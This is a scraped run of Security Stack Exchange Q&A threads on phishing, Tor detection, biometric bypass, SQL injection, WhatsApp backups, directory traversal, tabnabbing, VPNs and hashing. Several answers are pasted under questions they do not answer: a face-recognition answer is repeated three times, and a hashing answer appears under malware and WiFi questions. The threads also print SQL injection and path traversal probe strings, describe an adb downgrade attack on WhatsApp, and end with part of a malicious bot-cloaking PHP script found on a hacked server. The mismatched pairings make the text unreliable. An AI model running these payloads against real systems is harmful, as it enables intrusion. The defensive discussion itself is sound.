I would like to know why is it considered to be dangerous to open an email from an unknown source? I am using Gmail and I thought it's only unsafe to download an attachment and run it. The first thing that came into my mind was what if the email text contains XSS JavaScript code but I am sure that every email provider has protected their site from getting XSS-ed . What is going on behind the scenes when you get infected just by clicking on email and reading its content, for example on Gmail?
There is a small risk of an unknown bug — or a known but unpatched one — in your mail client allowing an attack by just viewing a message. I think, though, that this very broad advice is also given as a defense against some types of phishing scams . Social engineering attacks are common and can lead to serious trouble. Making sure people are at least suspicious is a first line of defense. It is like telling an elderly grandparent to never give their credit card info over the phone — okay, sure, there are plenty of circumstances where doing that is relatively safe, but when they keep getting scammed over and over, it's easier to just say: don't do it. Likewise, not opening mail keeps you from reading about the plight of an orphan in a war-torn region who has unexpectedly found a cache of Nazi gold and just needs $500 to smuggle it out and they'll share half with you, and your heart just goes out, and also that money wouldn't hurt.... Or, while you know the rule about attachments, this one says that it's pictures of the cutest kittens ever, and how can that be harmful — I'll just click it and okay now there are these boxes saying do I want to allow it, which is annoying because of course I do because I want to see the kittens....
{ "source": [ "https://security.stackexchange.com/questions/135884", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123105/" ] }
135,907
We work in an organisation which is supposed to be HIPAA compliant. Security is a big concern for us. We've been tasked to find out if any user is using anonymous proxy in the network. Is there a way we can find if Tor is being used inside our corporate network domain? We're using Symantec client protection. VPN is provided using Cisco.
You can use a list of Tor (uplink) nodes, add this to the outgoing firewall, setup a task to update this once a day and you'll be good. But Tor can also be used over a HTTP(S) proxy, so you will have to detect proxies as well. I am not sure if this is going to help you secure anything. As long as there is a connection to the internet, it would be possible to bypass these kind of security measures. You could end up spending endless time and energy to prohibit all kinds of proxies, VPN's, SSL tunnels and such. The advice is to just make sure they cannot do any harm by protecting whats important to your business, and leave users be. For example separate the network in compartments, use subnets, VLANs, DMZs and require authentication and authorization on private networks. Keep the important stuff in one zone, while allowing networking without restrictions on another. And so on...
{ "source": [ "https://security.stackexchange.com/questions/135907", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46219/" ] }
136,020
I found that this guy uploaded some face recognition code with a comment that he'd like to use it "as a security feature". This got me thinking; is face recognition a valid security feature, or is it "cool", but not very effective way to secure something?
No, not really. At least not as primary form of authentication. Biometrics in general are not good for authentication, because: You leave them all over the place, and there is no way to avoid that. They cannot be changed in case of a breach. You need to add a high error tolerance as to not cause usability problems. These tolerances lead to false positives, even without attacks, and make attacks possible. In practice, when implementing the algorithms, they usually have to balance between [false acceptance rate] and [false rejection rate]. This makes the efficiency of face recognition the lowest of all regarding the table. Its security is also lower than other biometric recognition system, especially compared to fingerprint scan. — Your face is NOT your password, Face Authentication ByPassing Lenovo – Asus – Toshiba (2009) I couldn't find a live demonstration for that paper, but here is one from a 31C3 talk about biometrics , which uses a simple picture, and can bypass required blinking. Here is an article from a person using a video to bypass a blinking requirement. Here is a more recent paper using more modern approaches: In this paper, we introduce a novel approach to bypass modern face authentication systems. More specifically, by leveraging a handful of pictures of the target user taken from social media, we show how to create realistic, textured, 3D facial models that undermine the security of widely used face authentication solutions. [...] In our opinion, it is highly unlikely that robust facial authentication systems will be able to operate using solely web/mobile camera input. Given the widespread nature of high-resolution personal online photos, today’s adversaries have a goldmine of information at their disposal for synthetically creating fake face data. Moreover, even if a system is able to robustly de- tect a certain type of attack - be it using a paper printout, a 3D-printed mask, or our proposed method - generalizing to all possible attacks will increase the possibility of false rejections and therefore limit the overall usability of the system. — Virtual U: Defeating Face Liveness Detection by Building Virtual Models from Your Public Photos (2016)
{ "source": [ "https://security.stackexchange.com/questions/136020", "https://security.stackexchange.com", "https://security.stackexchange.com/users/84365/" ] }
136,031
I need to be able to communicate with a REST API Service and store the username/password pair in a database. The client talks to the API from a server within our DMZ, but gets the credentials from a database outside of the DMZ within the network. I would like to be able to make this more secure so that if the server was compromised it would be difficult to access the credentials. What is the best approach for storing the credentials securely? I can't use a salt & hashing mechanism because the API demands the username/password pair as plain-text and they control the authentication process. Platform and languages in use: Windows/.NET/C#
No, not really. At least not as primary form of authentication. Biometrics in general are not good for authentication, because: You leave them all over the place, and there is no way to avoid that. They cannot be changed in case of a breach. You need to add a high error tolerance as to not cause usability problems. These tolerances lead to false positives, even without attacks, and make attacks possible. In practice, when implementing the algorithms, they usually have to balance between [false acceptance rate] and [false rejection rate]. This makes the efficiency of face recognition the lowest of all regarding the table. Its security is also lower than other biometric recognition system, especially compared to fingerprint scan. — Your face is NOT your password, Face Authentication ByPassing Lenovo – Asus – Toshiba (2009) I couldn't find a live demonstration for that paper, but here is one from a 31C3 talk about biometrics , which uses a simple picture, and can bypass required blinking. Here is an article from a person using a video to bypass a blinking requirement. Here is a more recent paper using more modern approaches: In this paper, we introduce a novel approach to bypass modern face authentication systems. More specifically, by leveraging a handful of pictures of the target user taken from social media, we show how to create realistic, textured, 3D facial models that undermine the security of widely used face authentication solutions. [...] In our opinion, it is highly unlikely that robust facial authentication systems will be able to operate using solely web/mobile camera input. Given the widespread nature of high-resolution personal online photos, today’s adversaries have a goldmine of information at their disposal for synthetically creating fake face data. Moreover, even if a system is able to robustly de- tect a certain type of attack - be it using a paper printout, a 3D-printed mask, or our proposed method - generalizing to all possible attacks will increase the possibility of false rejections and therefore limit the overall usability of the system. — Virtual U: Defeating Face Liveness Detection by Building Virtual Models from Your Public Photos (2016)
{ "source": [ "https://security.stackexchange.com/questions/136031", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123557/" ] }
136,038
I'm pen testing an application. The URL is basically app.php?app=appname . If app exists it gives correct output, but if it doesn't exist we get a internal server error 500. Vega detects it as a SQL injection vulnerability, but when I test it with sqlmap it cannot find injection in this url. Vega shows the URL app.php?app=appname'%20AND%201=2%20--%20 , but it also gives the same internal error. In this case is it really a SQL injection vulnerability? Can I force sqlmap to use this URL as a help?
No, not really. At least not as primary form of authentication. Biometrics in general are not good for authentication, because: You leave them all over the place, and there is no way to avoid that. They cannot be changed in case of a breach. You need to add a high error tolerance as to not cause usability problems. These tolerances lead to false positives, even without attacks, and make attacks possible. In practice, when implementing the algorithms, they usually have to balance between [false acceptance rate] and [false rejection rate]. This makes the efficiency of face recognition the lowest of all regarding the table. Its security is also lower than other biometric recognition system, especially compared to fingerprint scan. — Your face is NOT your password, Face Authentication ByPassing Lenovo – Asus – Toshiba (2009) I couldn't find a live demonstration for that paper, but here is one from a 31C3 talk about biometrics , which uses a simple picture, and can bypass required blinking. Here is an article from a person using a video to bypass a blinking requirement. Here is a more recent paper using more modern approaches: In this paper, we introduce a novel approach to bypass modern face authentication systems. More specifically, by leveraging a handful of pictures of the target user taken from social media, we show how to create realistic, textured, 3D facial models that undermine the security of widely used face authentication solutions. [...] In our opinion, it is highly unlikely that robust facial authentication systems will be able to operate using solely web/mobile camera input. Given the widespread nature of high-resolution personal online photos, today’s adversaries have a goldmine of information at their disposal for synthetically creating fake face data. Moreover, even if a system is able to robustly de- tect a certain type of attack - be it using a paper printout, a 3D-printed mask, or our proposed method - generalizing to all possible attacks will increase the possibility of false rejections and therefore limit the overall usability of the system. — Virtual U: Defeating Face Liveness Detection by Building Virtual Models from Your Public Photos (2016)
{ "source": [ "https://security.stackexchange.com/questions/136038", "https://security.stackexchange.com", "https://security.stackexchange.com/users/83056/" ] }
136,072
This is all not about their end-to-end transmission protocol and my question is mostly Android centric. What I ask myself: When reading about hacking and decrypting local WhatsApp database backups it is mentioned that a private key in a restricted app area is needed from Android. If you don't have a rooted phone you normally should not have access to this key. The backup files (file extension crypt5-12) are normally useless without this key. When you switch phones (e.g. buying a new one) you can copy your local sdcard/WhatsApp folder to the new phone and WhatsApp can decrypt that backup if the same number is used: source is here https://www.whatsapp.com/faq/en/android/20887921#restore First assumption: The backup key is saved on WhatsApp servers too. Otherwise a local phone to phone backup would not work? Second assumption: So the worst part is that if you backup on Google Drive, WhatsApp has theoretically access (?) to your (hopefully encrypted) backup and also access to the en-/decryption key on their servers. Or is there at least a separation between Google Drive not readable by WhatsApp itself? Does somebody has more details? One last word about end2end encryption protocol: It seems it is useless (not against normal hackers, but I think against US surveillance) when at least one of your friend will do a Google Drive backup of their chat (history of chats are retrievable).
First assumption: The backup key is saved on WhatsApp servers too. Otherwise a local phone to phone backup would not work? TL;DR : Yes, after some investigation, this seems to be the case. Secondary devices The protocol is quite complicated and not limited to WhatsApp, but works generally like this; The phone that uses chat app is called the first device . This device is the almighty device storing all sensitive data like private identity keys, connection passwords, local encryption keys, attachment encryption keys etc. All other devices are called second devices , this includes WhatsApp web and desktop clients. These clients are essentially dumb . Whenever a new device appears it needs to be authenticated via the first device first. WhatsApp does this using an initial QR-code (other apps use SMS tokens), and then via a set of proofs . Eventually the first device decides if a secondary device is allowed control over the sensitive data. If so, the second device receives these keys on request. With these keys the second device can download the contact file and decrypt it using the requested key. Same works for all media messages. A note for WhatsApp specific : these key requests live very short, and thus are secondary clients required to regularly ask the first device for a new key to access the data. This causes the annoying ' Phone not connected ' alert in WhatsApp web. Whenever you install WhatsApp on a new phone, this entire process will take place and the first device will authorize the new phone and immediately locks out one of the two active instances. You then have the choice to choose one of the phones. If you choose the new phone, ownership of all secrets will be transferred to the second device, which then becomes the first device which makes the circle complete. Backups After some investigation, decompiling of the app and running test scenarios, we can conduct the following: The app is using several local (SQLite) databases. Messages are stored in these databases unencrypted, and the databases itself are not encrypted either. You can check this yourself by downloading the .db files from the data/ folder. This is the default storage location for WhatsApp in running mode, and is unencrypted for performance reasons most likely. Normal apps should not be able to access the .db files in the data folder, but there are quite a few adb workarounds. Database files including settings and messages are backuped in Google Drive (if you choose to do so). The app can request a lock on the folder in Google Drive to prevent users from downloading or accessing the backup. The message databases send to the remote backup location are the msgstore.db.crypt[0-12] files, where the last number denotes the protocol version. The databases are encrypted with a key stored in the data folder. This key is in fact stored on the WhatsApp server. Second assumption: So the worst part is that if you backup on Google Drive, WhatsApp has theoretically access (?) to your (hopefully encrypted) backup and also access to the en-/decryption key on their servers. Or is there at least a separation between Google Drive not readable by WhatsApp itself? Does somebody has more details? The moment you install a new device and setup your Google Account, the files can be requested by the app and configured on the local device. This includes the axolotl database containing the identity key which is necessary in order to prove your identity to others. The decryption key is retrieved after the proving ownership of the phone number (username) to the newly installed WhatsApp instance. In theory, WhatsApp should not be able to access those files, but only you and Google. Ofcourse, WhatsApp could download the files and send them to another location. But at some point we need to put trust in the app, especially if it's not opensource. WhatsApp is making local backups as well, usually twice a day in sdcard/whatsapp. These local backups also contain the identity key and the message storage databases, and are in fact encrypted. Once again the encryption key is stored on the remote server together with your WhatsApp profile. This explains why you can move the entire WhatsApp backup folder from one device to another. Without a verified phone number you cannot read the backup files, or use the identity key, however any rooted device can give easy access to the original, unencrypted, database files. One last word about end2end encryption protocol: It seems it is useless (not against normal hackers, but I think against US surveillance) when at least one of your friend will do a Google Drive backup of their chat (history of chats are retrievable). The story does not get any better from this point, as we know that Google and other companies such as Facebook and WhatsApp supply files on request under the FISA act. There is no need to strike at the end-to-end communication as there is already a 'backdoor'. E2E only protects against active adversaries on the communication channel, who do not possess the power to demand backup files from party one and the decryption key from the other. Window of Attack Suppose we look at the situation from a non-government or 'normal' attacker with limited resources, then the device is the obvious weakness. Any app with root privileges can also access databases, can copy keys and so forth. The default Android ROMs contains many apps running under the system user, but also the vendor's apps shipped with the ROM (and updates) are protected from user intervention, and thus run as system . Malicious apps are not without risk either. With the correct permissions they have full control over the sdcard storage, and can access the encrypted backups. When the verification SMS is intercepted at the correct moment (hooking in on the SMS receive call) and the phone number is copied, it should be possible to activate a self-controlled WhatsApp instance and to receive the database decryption key. The attack becomes even more plausible if the adversary has control over mobile communications (which governments often do). The adb attack is even worse since it doesn't require root permissions. Basically a downgrade attack is possible where an older version of WhatsApp is installed via the bridge interface. This so called legacy WhatsApp can be tricked into a full application backup, resulting in a tar archive. The tarball is pulled to the adb server side and extracted. When properly prepared it would take an USB cable and a matter of seconds.
{ "source": [ "https://security.stackexchange.com/questions/136072", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4159/" ] }
136,116
I was working with this web-app, when someone pen-tested it and sent me a huge report that says my app is vulnerable to a Directory traversal attack. Here is one sample: Testing Path: http://127.0.0.1:80/??/etc/issue <- VULNERABLE! I put http://127.0.0.1:80/??/etc/issue in my browser, but it gave me the home page, it didn't at all return the /etc/issue file. Then I tried with curl and it too returned the homepage. Could somebody please explain me how my app is vulnerable, if the /etc/issue file is not returned. The app is coded in Python 2.7, with flask as the framework and Nginx as a reverse proxy. Two more samples from the report, along with the corresponding response :- Testing Path: http://127.0.0.1:80/??/etc/passwd <- VULNERABLE! GET Request - app: 0|req: 1587/1587] 127.0.0.1 () {34 vars in 488 bytes} [Tue Sep 6 15:47:13 2016] GET /??/etc/passwd => generated 982 bytes in 4 msecs (HTTP/1.1 200) 2 headers in 80 bytes1 Testing Path: http://127.0.0.1:80/??/??/etc/passwd <- VULNERABLE! GET Request - app: 0|req: 1591/1591] 127.0.0.1 () {34 vars in 493 bytes} [Tue Sep 6 15:47:14 2016] GET /??/??/etc/passwd => generated 982 bytes in 5 msecs (HTTP/1.1 200) 2 headers in 80 bytes
I sent a report for a similar vulnerability recently and got a similar response. Turns out most browsers and CLI http clients remove path traversal components from the URL. For instance if on Firefox you type the URL http://example.com/../../../etc/passwd the GET request that arrives at example.com will look like this: GET /etc/passwd HTTP/1.1 [Ommitted headers] Same deal with wget. You should try with a lower level tool, like telnet or netcat: $ telnet example.com 80 GET /../../../etc/issue HTTP/1.1 HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Wed, 07 Sep 2016 12:38:13 GMT Server: ECSF (fll/078B) Then again, it might have been a false positive, your auditor should've included the contents of /etc/issue in the report. That's kind of the point of using issue and not passwd. You should at least follow up with your auditor to confirm whether it was a false positive. If that's not possible, arrange a new pentest or perform your own with a path traversal fuzzer like dotdotpwn Never assume you're secure, ensure you are. Especially after a report like that.
{ "source": [ "https://security.stackexchange.com/questions/136116", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123651/" ] }
136,227
Wikipedia is not very explicit on this, The exploit employs scripts to rewrite a page of average interest with an impersonation of a well-known website, when left unattended for some time. What is 'tabnabbing', how does one do it?
Tabnabbing is a phishing technique where a malicious web site changes its looks while the tab is inactive in order to trick the user into entering credentials. This page is simultaneously a description and a demo. When you visit it, it shows a description of what tabnabbing is. When you then click another tab, it changes the tabs favicon and title to look like Gmail. Later, when the user wants to read her mail she goes to this tab thinking it is Gmail and enters her credentials. Edit: In this animation, you see that while I am reading SE, the tab that at first looked harmless changes in the background to look like Gmail. This way the page tries to trick me into submitting my credentials.
{ "source": [ "https://security.stackexchange.com/questions/136227", "https://security.stackexchange.com", "https://security.stackexchange.com/users/68638/" ] }
136,230
My friends country is fastly moving to Dictatorship. Currently, I am not in that country but when I try to talk to my friends, they are afraid of talking to me via Whatsapp or Skype because without any logical reason, people are sent to prisons and they are afraid that the (written or verbal) conversations are eavesdropped by the government. When it comes to my question, is it so easy for a country to eavesdrop the conversations on internet (all the internet service providers in the country are under their control), or is it just a conspiracy theory to terrify the people?
Tabnabbing is a phishing technique where a malicious web site changes its looks while the tab is inactive in order to trick the user into entering credentials. This page is simultaneously a description and a demo. When you visit it, it shows a description of what tabnabbing is. When you then click another tab, it changes the tabs favicon and title to look like Gmail. Later, when the user wants to read her mail she goes to this tab thinking it is Gmail and enters her credentials. Edit: In this animation, you see that while I am reading SE, the tab that at first looked harmless changes in the background to look like Gmail. This way the page tries to trick me into submitting my credentials.
{ "source": [ "https://security.stackexchange.com/questions/136230", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123766/" ] }
136,379
Our client has come up with the requirement that in case the username in question has had multiple failed login attempts, the incorrectly entered password(s) must be shown once a successful login is performed. Correctly entered information, including previous passwords, will not be shown in any case. Our lead dev has told us it is technically possible by not hashing incorrect entries, but she is extremely uncomfortable with the feature and thus it has been put on hold while we brainstorm it out. The website in question is a broad mapping/GIS application that does not feature any monetary transactions whatsoever. Other login/authentication options include Google/LinkedIn/Twitter/facebook, so obviously no passwords to be stored there and handling that is primarily a UX issue. What security vulnerabilities come with implementing such a feature? Our client is not entirely without technical knowledge so a general explanation is enough. My apologies if the question is too broad or the answer very obvious.
The primary issue is that incorrect passwords have to be stored in a way that allows them to be later displayed to users. Which, as your dev pointed out, means they can't be cryptographically hashed first. The result is that you store them either as plaintext (bad) or encrypted (better but not normally recommended). The biggest risk is if this database of invalid passwords becomes accessible to attackers. Either they compromise the server, perform SQL injection, or retrieve it in some other way. Rather than cracking the primary passwords, which hopefully are strongly hashed and therefore tougher targets, they could decide to compromise accounts using the information in the invalid password history. Either they access the plaintext passwords easily, or they attempt to find the encryption key that allows them to decrypt back to plaintext passwords. A common source of login failures is minor typos during the password entry process. So my password is Muffins16 but I type in mUFFINS16 because my caps lock is on. Or Muffins166 because I hit the same key twice. Or Muffina16 because my finger hit the wrong key. As you can see these variations are close enough to the original that attackers can probably determine the valid password from invalid passwords by trying a few minor alterations or comparing wrong passwords to likely dictionary words or names. This problem is exacerbated because most people use password choices similar to these formats and not random strings. It is harder for an attacker to identify the typo if your invalid password is V8Az$p4/fA, although still much easier to try variations of that then guessing it without any info. Another risk is that users may not remember which of their passwords they used on this site so they try their common ones. Now this site is suddently a bigger target because an attacker might be able to not only compromise a user's account there but also on other sites with the handy list of 'invalid' passwords. You can mitigate some of these risks by wiping storage of invalid passwords immediately after display following a valid login. That should limit the window of opportunity for an attacker to access and benefit from the data. The question you should probably ask your client is how they predict users will benefit from seeing their invalid passwords. Is it so users can identify how they mistyped their password? Typos aren't intentional so it's not likely that showing them their mistake will improve future login attempts. So users can identify an attacker trying to guess their passwords? Similar feedback can be provided by listing date, time, IP/geolocation or other info for invalid attempts without the attempted password. So users know that they screwed up during password entry and don't blame the site's login system? This seems like the only one with merit and I'm not sure it provides enough value to justify the risk. My guess is that once you better understand what they're trying to accomplish with this feature you can probably suggest more secure alternatives.
{ "source": [ "https://security.stackexchange.com/questions/136379", "https://security.stackexchange.com", "https://security.stackexchange.com/users/109044/" ] }
136,543
I am moving to Germany, and in the contract I signed I had to accept that all my data traffic can/will be checked by the apartment owner. The contract states: Flatrate, aber hinter 30GB Tarif priorisiert, aslo etwas langsamer Ja ich weiss, daß meine Daten überprüft werden. Which translates to: That after using an amount of 30GB data, the speed can/will be slower. And the critical: Yes, I know that my data is checked/investigated Later in the contract one can read the following Im Rahmen der gesetzlichen Bestimmungen (Anti-Terror-Gesetze und TKG) kann das Protokollieren der Daten erfolgen. Im Mietpreis ist eine FLAT-Rate enthalten, dabei können jedoch einzelne Ports gesperrt sein oder bestimmte Verbindungen mittels Traffic-Shapping bevorzugt oder verlangsamt werden. Bestimmte Geschwindigkeiten werden nicht zugesichert. Die Verbindung funktioniert nur, wenn DHCP eingeschaltet ist (z.B. bei Windows IP-adresse automatisch beziehen). Which translates to: In accordance with statutory requirements (anti-terror laws and TKG) to log the data can take place. a FLAT rate is in the rental amount, but it can individual ports to be blocked or certain compounds by traffic Shapping preferred or slowed. Certain speeds are not guaranteed. The connection works only if DHCP is enabled (eg automatically when Windows IP address relate). Since I really needed this apartment I was forced to accept this. But not anywhere does the contract says that I can not make it difficult for the landlord to check my traffic. So my question is: would it be possible to make it difficult for the person watching my data traffic to see what I am actually doing on the internet? As you probably can tell, I do not know alot in this field. Internet is provided via LAN, but I am going to use a D-link dir-635 router. And I am running Linux Mint. I am not familiar with the prices of 4g/LTE in Germany, so I can not say if that is an option yet. I do not think I can get my own internet installed, and since the internet is provided in the rent (whether I want it to or not) it feels redundant to install a personal internet.
FINAL (hopefully) UPDATE: Well after all the very interesting and valuable discussion, it seems to me as though initial thoughts were correct. From the updated question, I would say that the restrictions are pretty standard for Germany. My recommendation is that you ignore the noise and the concerns and simply make use of the service. Unless you have some very specific security needs that you haven't shared, using HTTPS wherever possible (which is best practice anyway) is sufficient. In any case, the other options discussed would all add overheads to your traffic which would use up your 30GB even sooner and slow things down. There are several things you can do. Provided that the terms and conditions of use are OK with them. You don't say what country you are in but you might want to get the terms of use checked by a lawyer since some terms may not be legally permissible anyway. Here are four of the main ways you can protect your Internet traffic from the prying intermediate. Make sure you always only connect to HTTPS sites When you use HTTPS sites, the traffic is encrypted between you and the endpoint. Your landlords infrastructure will not be able to do more than examine the destination IP address, port and DNS. In particular, things like banking and health sites will remain secure. Use a VPN A VPN in this case is a 3rd party service that encrypts ALL of the traffic (not just web traffic as in 1) between your machine and the VPN host. This prevents any inspection of the traffic at all and it will appear as though you only talk to the VPN destination. Unfortunately, it is possible that common VPN end-points might be blocked or even a smart security system used that will dynamically identify VPN traffic and ban it. Check the terms of use from your landlord carefully. TOR TOR is a way to obfuscate connections across the Internet and is often associated with "the dark web". However, it has legitimate uses as well. Unfortunately, it can add quite an overhead to traffic and may be unacceptably slow. Typically TOR will be used for web browsing, other network traffic would not be affected. Use the Mobile network If you are fortunate enough to live in an area with a) good (4G/LTE) mobile coverage and b) an affordable data tariff. Then using a 4G/LTE mobile router may be an option. You can get some staggeringly good data rates. Don't expect to be free of restrictions though. Many tariffs don't allow device sharing, you'll need a special tariff for mobile data. You might not be allowed to use all services (like VPN's) and you are more likely to have national-level restrictions applied such as the UK's national "firewall" . It goes without saying (so I will say it anyway!) that you should ensure that you are staying within the letter of the laws of your locality & the legitimate terms of use of the landlords network. However, none of the above are illegal in most countries (well in most Western countries anyway) as long as you are not using them to do illegal activities. TOR and VPN's may possibly be illegal or at least get you unwelcome attention in certain countries. UPDATE: Without question, the most security would be provided by a VPN. However, that will only be useful if the landlords network allows VPN traffic. In addition, VPN's also carry an overhead so things like real-time traffic (Skype voice/video for example) and online gaming would be impacted quite significantly. In addition, VPN's will normally come at a cost though there are some discount codes around that might help. It is possible to set up your own VPN if you have a server on the Internet to run it on. Most VPS hosts wont allow it but some will as long as you keep it private. The real question is - do you really need to be bothered? That's why I mentioned HTTPS first. Since this protects your information to sites and since all decent online services already use HTTPS, you might find that this is a storm in a teacup. UPDATE 2: As some others have pointed out. There are many flavours of VPN. A commercial service will be the easiest to consume but you need to do your homework to find the best for your region. Commercial VPN's can also be relatively easily blocked both by end point and by traffic inspection. Some VPN's require specific ports to be open on the network and these might not be available. Test before you buy. In general, those offering SSL-based or OpenVPN-based are likely to offer more options and be easier to get through any blocks. Another form of VPN is to use an SSH client such as PUTTY (for Windows) connected to an SSH server (perhaps on your own or a friends VPS). You can throw in a local SOCKS proxy client and then you will have a very configurable private VPN service. Not especially easy to set up though if you don't understand the terminology. Note that many VPS services ban their use for even private VPNs. Another thing to note is that there are several ways for security infrastructure to spot VPN traffic and therefore block it. Known end points for commercial services and known ports for VPN types are the easiest but it is possible to examine traffic patterns and work out that even apparent SSL traffic (e.g. if using port 443 for VPN) isn't actually.
{ "source": [ "https://security.stackexchange.com/questions/136543", "https://security.stackexchange.com", "https://security.stackexchange.com/users/114327/" ] }
136,739
If I use AES-GCM and encrypt data with a 128 Bit Key and always use the same Nonce. Is using the same nonce a security risk? Can a hacker guess the Key? Or is the Nonce only to verify that the message was not corrupted? Especially if I encrypt/store small amounts of text like in an dictionary: a aa b bb c cc ... Thanks
When using AES-GCM, using the same nonce and key pair for multiple messages is catastrophic. You lose all of the security guarantees AES is supposed to provide. This is the worse possible scenario you could create. It is critical when using AES-GCM that the nonce is never repeated for any given key. The best way to ensure this is to use a cryptographically strong PRNG to generate a new 96-bit nonce for each message, and to re-key at reasonably regular intervals, where "reasonably regular" is defined by how much data and how many messages you're encrypting.
{ "source": [ "https://security.stackexchange.com/questions/136739", "https://security.stackexchange.com", "https://security.stackexchange.com/users/123759/" ] }
136,900
I have been reading about password management lately (very interesting stuff!) and was wondering how different the hashes would be for similar strings. Is it possible to know if a password guess was close by comparing the resulting hash to the real hash? For example, if the real password is "password123" and a hacker tries "Password123", "password1234", "password124", etc., would the generated hashes be similar enough to the real hash that either the hacker or their computer could tell they were on the right track? Let's assume that the hacker knows any salt, pepper, cayenne powder, adobo, whatever... If they try the right password they will generate a matching hash. (I think this might vary depending on the hash function used, but I don't know this for sure.)
No, you cannot determine how close you guessed looking at the hash. A hash function is designed with this in mind: one single changed bit on the input must change a lot of bits on the output. Its called Avalanche Effect . Bellow are SHA1 hashes for some of your example passwords: cbfdac6008f9cab4083784cbd1874f76618d2a97 - password123 b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1 - Password123 2b4bfcc447c3c8726d26c22927a68f511d5e01cc - password124 115b55dcc1cd9a0dfdd60c120e83eaf658c45fc6 - right horse battery staple abf7aad6438836dbe526aa231abde2d0eef74d42 - correct horse battery staple A single bit change will completely change the hashing result. In fact, in an ideal case for every bit of input change every bit of output will be changed with a 50% probability.
{ "source": [ "https://security.stackexchange.com/questions/136900", "https://security.stackexchange.com", "https://security.stackexchange.com/users/122457/" ] }
136,917
So one of my laptops had a virus recently. I managed to remove it by running my computer in safe mode and then running my Antivirus software (norton). My laptop appears on be running fine now. Should I feel ok checking my bank account and doing personal business items on it now? Or should I still be worried that a virus is there? Computer is less than 2 years old. Barely used. Computer was acting funny and slower than usually so I brought it into safe mode and my Antivirus discovered the virus and removed it.
No, you cannot determine how close you guessed looking at the hash. A hash function is designed with this in mind: one single changed bit on the input must change a lot of bits on the output. Its called Avalanche Effect . Bellow are SHA1 hashes for some of your example passwords: cbfdac6008f9cab4083784cbd1874f76618d2a97 - password123 b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1 - Password123 2b4bfcc447c3c8726d26c22927a68f511d5e01cc - password124 115b55dcc1cd9a0dfdd60c120e83eaf658c45fc6 - right horse battery staple abf7aad6438836dbe526aa231abde2d0eef74d42 - correct horse battery staple A single bit change will completely change the hashing result. In fact, in an ideal case for every bit of input change every bit of output will be changed with a 50% probability.
{ "source": [ "https://security.stackexchange.com/questions/136917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99332/" ] }
136,920
What I basically want to do is, perform a test on my Wi-Fi and brute force it instead of a dictionary attack. I googled, and all of them showed me examples of dictionary attack and no bruteforcing. My password is somewhat like this- aXb2@abc . I know this can take a lot of time, but since it's my home I can let my computer do the work. Also, is there a better option than bruteforcing this type of passwords? I am using Kali Linux 2. Thanks.
No, you cannot determine how close you guessed looking at the hash. A hash function is designed with this in mind: one single changed bit on the input must change a lot of bits on the output. Its called Avalanche Effect . Bellow are SHA1 hashes for some of your example passwords: cbfdac6008f9cab4083784cbd1874f76618d2a97 - password123 b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1 - Password123 2b4bfcc447c3c8726d26c22927a68f511d5e01cc - password124 115b55dcc1cd9a0dfdd60c120e83eaf658c45fc6 - right horse battery staple abf7aad6438836dbe526aa231abde2d0eef74d42 - correct horse battery staple A single bit change will completely change the hashing result. In fact, in an ideal case for every bit of input change every bit of output will be changed with a 50% probability.
{ "source": [ "https://security.stackexchange.com/questions/136920", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124512/" ] }
136,966
I am new to this community, so please forgive me if my question is stupid. I discovered that my server got hacked, and found several PHP files on it. I haven't been lazy and tried my best to detect what the file actually was doing, but im really not understanding what the purpose of it is. One PHP file is: <?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i', '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i', '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i', '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i', '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i', '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i', '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i', '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i', '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i', '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i', '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i', '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i', '#BingBot#i' ) ; if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){ $isbot = 1; } if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) { $isbot = 1; } $adr1 = "....................................."; $adr2 = "."; $adr3 = "..................................................................................................................................................................................................................."; $adr4 = ".............................................................................................................................................................................................................."; $ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4); if ($isbot) { $myname = basename($_SERVER['SCRIPT_NAME'], ".php"); if (file_exists($myname)) { $html = file($myname); $html = implode($html, ""); echo $html; 